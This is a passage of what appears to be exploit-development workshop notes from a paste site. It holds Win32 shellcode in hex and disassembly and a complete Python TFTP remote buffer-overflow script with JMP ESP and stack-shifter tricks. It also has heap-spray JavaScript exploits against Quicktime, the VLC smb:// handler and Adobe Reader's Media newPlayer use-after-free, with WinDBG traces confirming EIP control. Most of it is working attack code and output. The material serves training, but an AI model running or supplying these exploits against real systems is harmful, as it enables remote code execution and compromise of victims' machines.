  778. 000000E9 29CC sub esp,ecx
  779. 000000EB 89E7 mov edi,esp
  780. 000000ED 6A44 push byte +0x44
  781. 000000EF 89E2 mov edx,esp
  782. 000000F1 31C0 xor eax,eax
  783. 000000F3 F3AA rep stosb
  784. 000000F5 FE422D inc byte [edx+0x2d]
  785. 000000F8 FE422C inc byte [edx+0x2c]
  786. 000000FB 93 xchg eax,ebx
  787. 000000FC 8D7A38 lea edi,[edx+0x38]
  788. 000000FF AB stosd
  789. 00000100 AB stosd
  790. 00000101 AB stosd
  791. 00000102 6872FEB316 push dword 0x16b3fe72
  792. 00000107 FF7544 push dword [ebp+0x44]
  793. 0000010A FFD6 call esi
  794. 0000010C 5B pop ebx
  795. 0000010D 57 push edi
  796. 0000010E 52 push edx
  797. 0000010F 51 push ecx
  798. 00000110 51 push ecx
  799. 00000111 51 push ecx
  800. 00000112 6A01 push byte +0x1
  801. 00000114 51 push ecx
  802. 00000115 51 push ecx
  803. 00000116 55 push ebp
  804. 00000117 51 push ecx
  805. 00000118 FFD0 call eax
  806. 0000011A 68ADD905CE push dword 0xce05d9ad
  807. 0000011F 53 push ebx
  808. 00000120 FFD6 call esi
  809. 00000122 6AFF push byte -0x1
  810. 00000124 FF37 push dword [edi]
  811. 00000126 FFD0 call eax
  812. 00000128 8B57FC mov edx,[edi-0x4]
  813. 0000012B 83C464 add esp,byte +0x64
  814. 0000012E FFD6 call esi
  815. 00000130 52 push edx
  816. 00000131 FFD0 call eax
  817. 00000133 68F08A045F push dword 0x5f048af0
  818. 00000138 53 push ebx
  819. 00000139 FFD6 call esi
  820. 0000013B FFD0 call eax
  821.  
  822.  
  823.  
  824.  
  825. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  826. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  827. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  828. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  829. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  830. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  831. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  832. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  833. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  834. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  835.  
  836.  
  837. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  838. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  839. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  840. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  841. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  842. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  843. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  844. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  845. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  846. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  847. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  848.  
  849.  
  850. STACK SHIFTER:
  851. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  852. prepend += "\x44" # inc esp
  853.  
  854.  
  855.  
  856.  
  857.  
  858.  
  859.  
  860.  
  861.  
  862.  
  863.  
  864.  
  865.  
  866.  
  867. ---- final script ----
  868.  
  869. #!/usr/bin/python2
  870. #TFTP Server remote Buffer Overflow
  871.  
  872. import sys
  873. import socket
  874. import struct
  875.  
  876. if len(sys.argv) < 2:
  877. sys.stderr.write("Usage: tftpd.py <host>\n")
  878. sys.exit(1)
  879.  
  880. target = sys.argv[1]
  881. port = 69
  882.  
  883. eip = 0x7e429353 # jmp esp in USER32.DLL
  884.  
  885. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  886. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  887. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  888. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  889. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  890. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  891. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  892. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  893. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  894. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  895.  
  896. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  897. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  898. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  899. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  900. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  901. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  902. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  903. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  904. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  905. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  906. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  907.  
  908. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  909. prepend += "\x44" # inc esp
  910.  
  911. buf = "\x00\x01" # receive command
  912.  
  913. buf += "\x90" * (256 - len(part2)) # NOPs
  914. buf += part2 # shellcode part 2
  915. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  916. buf += prepend # stack shifter
  917. buf += part1 # shellcode part 1
  918. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  919. buf += "\x00" # END
  920.  
  921. # print buf
  922.  
  923. # buf = "\x00\x01" # receive command
  924.  
  925. # buf += "A" * 300 + "\x00"
  926.  
  927. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  928.  
  929. try:
  930. sock.connect((target, port))
  931. sock.sendall(buf)
  932. except Exception as e:
  933. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  934. finally:
  935. sock.close()
  936. sys.stderr.write("Sent.\n")
  937.  
  938.  
  939.  
  940. -----------------------------------------------------------------------------------------------------------------
  941.  
  942.  
  943.  
  944.  
  945. How does all of this actually work
  946.  
  947.  
  948.  
  949.  
  950. Total shellcode length: 315
  951.  
  952. Part1: 150
  953. Part2: 165
  954.  
  955.  
  956. NOPS * (256 - 165)
  957.  
  958. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  959. | | |
  960. 256 260 150 (410) |
  961. |<------------------------------------------------------------------------------------------------------------|
  962. Jump to the
  963. 30 byte mark
  964.  
  965.  
  966.  
  967. ############################
  968. # Lab 3: Browsers Exploits #
  969. ############################
  970.  
  971. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
  972. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  973. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  974.  
  975. <object id=quicktime clsid="999-999999-99-99999">
  976. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  977. </object>
  978.  
  979. var buf = "";
  980. for(i = 0; i < 50000; i++)
  981. buf += "A";
  982. var myobject = document.getElementById("quicktime");
  983. myobject.url = buf;
  984.  
  985. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  986.  
  987. - Browsers (Flash)
  988. - PDF
  989. - MS Office / OOo
  990.  
  991. VLC smb:// exploit
  992. ------------------
  993.  
  994. EXPLOIT VECTOR
  995.  
  996. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  997.  
  998. Exploit Scripts
  999. - ffvlc
  1000.  
  1001. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  1002.  
  1003. perl daemon.pl vlc0.html
  1004.  
  1005. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
  1006. Browse to http://your_host_ip_address:8080/
  1007.  
  1008. vlc0.html
  1009. ---------
  1010. <script>
  1011. var buf = "";
  1012. for(i = 0; i < 1250; i++)
  1013. buf += unescape("%41%41%41%41");
  1014. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1015. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1016. </script>
  1017.  
  1018. vlc1.html
  1019. ---------
  1020. <script>
  1021.  
  1022. // shellcode created in heap memory
  1023. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1024.  
  1025. // 800K block of NOPS
  1026. var nop = unescape("%u9090%u09090"); // 4 NOPS
  1027. while(nop.length < 0xc0000) {
  1028. nop += nop;
  1029. }
  1030.  
  1031. // spray the heap with NOP+shellcode
  1032. var memory = new Array();
  1033. for(i = 0; i < 50; i++) {
  1034. memory[i] = nop + shellcode;
  1035. }
  1036.  
  1037. // build the exploit payload
  1038. var buf = "";
  1039. for(i = 0; i < 1250; i++)
  1040. buf += unescape("%41%41%41%41");
  1041. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1042.  
  1043. // trigger the exploit
  1044. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1045. </script>
  1046.  
  1047. perl daemon.pl vlc1.html
  1048.  
  1049. Search for where our NOPS+shellcode lies in the heap
  1050.  
  1051. s 0 l fffffff 90 90 90 90 cc cc cc cc
  1052.  
  1053. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  1054. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1055. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1056. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1057. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1058. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1059. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1060. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1061. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1062. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1063. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1064. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1065. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1066. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1067. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1068. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1069. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1070.  
  1071. Edit vlc2.html
  1072. replace %41%41%41%41 with %07%07%07%07
  1073.  
  1074. (928.fd0): Break instruction exception - code 80000003 (first chance)
  1075. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  1076. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  1077. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1078. 07100000 cc int 3
  1079. 0:019> u
  1080. 07100000 cc int 3
  1081. 07100001 cc int 3
  1082. 07100002 cc int 3
  1083. 07100003 cc int 3
  1084. 07100004 cc int 3
  1085. 07100005 cc int 3
  1086. 07100006 cc int 3
  1087. 07100007 cc int 3
  1088.  
  1089. Create vlc3.html (Copy vlc2.html to vlc3.html)
  1090. ----------------------------------------------
  1091. Win32 Reverse Shell
  1092. - no restricted characters
  1093. - Encoder NONE
  1094. - use the Javascript encoded payload generated by msfweb
  1095.  
  1096.  
  1097.  
  1098.  
  1099. #######################
  1100. # Lab 4: PDF EXPLOITS #
  1101. #######################
  1102.  
  1103.  
  1104. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
  1105. Acrobat Media newPlayer exploit
  1106. -------------------------------
  1107.  
  1108. Use-after-free bug
  1109.  
  1110. Exploit scripts are online at 172.16.0.100
  1111. - adobe_mnp
  1112.  
  1113. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  1114.  
  1115.  
  1116. mnp0.pdf
  1117.  
  1118. - Open up acrobat reader
  1119. - WinDBG
  1120. - F6 attach to AcroRd32.exe
  1121. - g to Go
  1122.  
  1123. EIP = 41414141
  1124.  
  1125. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  1126.  
  1127. mnp1.pdf
  1128.  
  1129. All we are doing is changing EIP to 0c0c0c0c.
  1130. There is no heap spray in this one.
  1131.  
  1132. This exception may be expected and handled.
  1133. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  1134. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  1135. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  1136. 0c0c0c0c ?? ???
  1137.  
  1138. We know we get EIP control
  1139.  
  1140. mnp2.pdf
  1141.  
  1142. Put in the heap spray.
  1143.  
  1144. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1145.  
  1146. var nops = unescape("%u9090%u9090");
  1147.  
  1148. while(nops.length <= 32768)
  1149. nops += nops;
  1150. nops = nops.substring(0,32768 - shellcode.length);
  1151.  
  1152. memory = new Array();
  1153.  
  1154. for(i = 0; i < 1500; i++) {
  1155. memory[i] = nops + shellcode;
  1156. }
  1157.  
  1158. 1500 NOP+shellcode blocks of 32K NOPs each
  1159.  
  1160. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  1161.  
  1162. We want to see what led to the crash.
  1163.  
  1164. EIP is invalid, so we can't disassemble around EIP
  1165.  
  1166. We need to trace the function that called us and crashed.
  1167. - STACK TRACE
  1168. - Dumps all the frames from the top of the stack.
  1169. - show you the series of calls that led up to the crash.
  1170. - we will analyze the topmost function on the frame.
  1171.  
  1172. WinDBG - stack trace - "k" command
  1173.  
  1174. 0:000> k
  1175. ChildEBP RetAddr
  1176. WARNING: Frame IP not in any known module. Following frames may be wrong.
  1177. 0013fb34 2d843117 0x90909090
  1178. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  1179. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  1180. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  1181. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  1182. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  1183. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  1184. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  1185. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  1186. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  1187. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  1188. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  1189. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  1190. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  1191. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  1192. 0013ffc0 7c817067 AcroRd32+0x4004
  1193. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  1194.  
  1195. 2d843117 -- the return address that we would have returned to, if we didnt crash.
  1196. address 2d843117-2 we will have a CALL instruction.
  1197.  
  1198. u 2d843117
  1199. u 2d843117-2
  1200. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  1201. u 2d843117-4
  1202.  
  1203. 0:000> u 2d843117-3
  1204. Multimedia!PlugInMain+0x41b66:
  1205. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  1206. 2d843117 6a00 push 0
  1207. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  1208. 2d84311e 56 push esi
  1209. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  1210. 2d843124 83c40c add esp,0Ch
  1211. 2d843127 66b80100 mov ax,1
  1212. 2d84312b 5e pop esi
  1213.  
  1214. We control EDX
  1215. edx=0c0c0c0c
  1216.  
  1217. call [edx+4] = call [0c0c0c10]
  1218. dd edx+4
  1219.  
  1220. 0:000> dd edx+4
  1221. 0c0c0c10 90909090 90909090 90909090 90909090
  1222. 0c0c0c20 90909090 90909090 90909090 90909090
  1223.  
  1224. 0:000> u 2d843117-7
  1225. Multimedia!PlugInMain+0x41b62:
  1226. 2d843110 8b10 mov edx,dword ptr [eax]
  1227. 2d843112 8bc8 mov ecx,eax
  1228. 2d843114 ff5204 call dword ptr [edx+4]
  1229.  
  1230. dd eax
  1231.  
  1232. 0:000> dd eax
  1233. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  1234. 02e2d690 42424242 42424242 42424242 42424242
  1235. 02e2d6a0 42424242 42424242 42424242 42424242
  1236. 02e2d6b0 42424242 42424242 42424242 42424242
  1237. 02e2d6c0 42424242 42424242 00000000 00000000
  1238.  
  1239. mnp3.pdf
  1240.  
  1241. change the NOPs 90909090 to 0c0c0c0c
  1242.  
  1243. mov edx, [eax]
  1244. call [edx+4]
  1245.  
  1246. edx = 0c0c0c0c
  1247. edx+4 = 0c0c0c10
  1248. contents at edx+4 will also be "0c0c0c0c"
  1249.  
  1250. EIP will jump to 0c0c0c0c
  1251.  
  1252. and...
  1253.  
  1254. 0:000> u 0c0c0c0c
  1255. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  1256. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  1257. 0c0c0c0c 0c0c or al,0Ch
  1258. 0c0c0c0e 0c0c or al,0Ch
  1259. 0c0c0c10 0c0c or al,0Ch
  1260. 0c0c0c12 0c0c or al,0Ch
  1261. 0c0c0c14 0c0c or al,0Ch
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement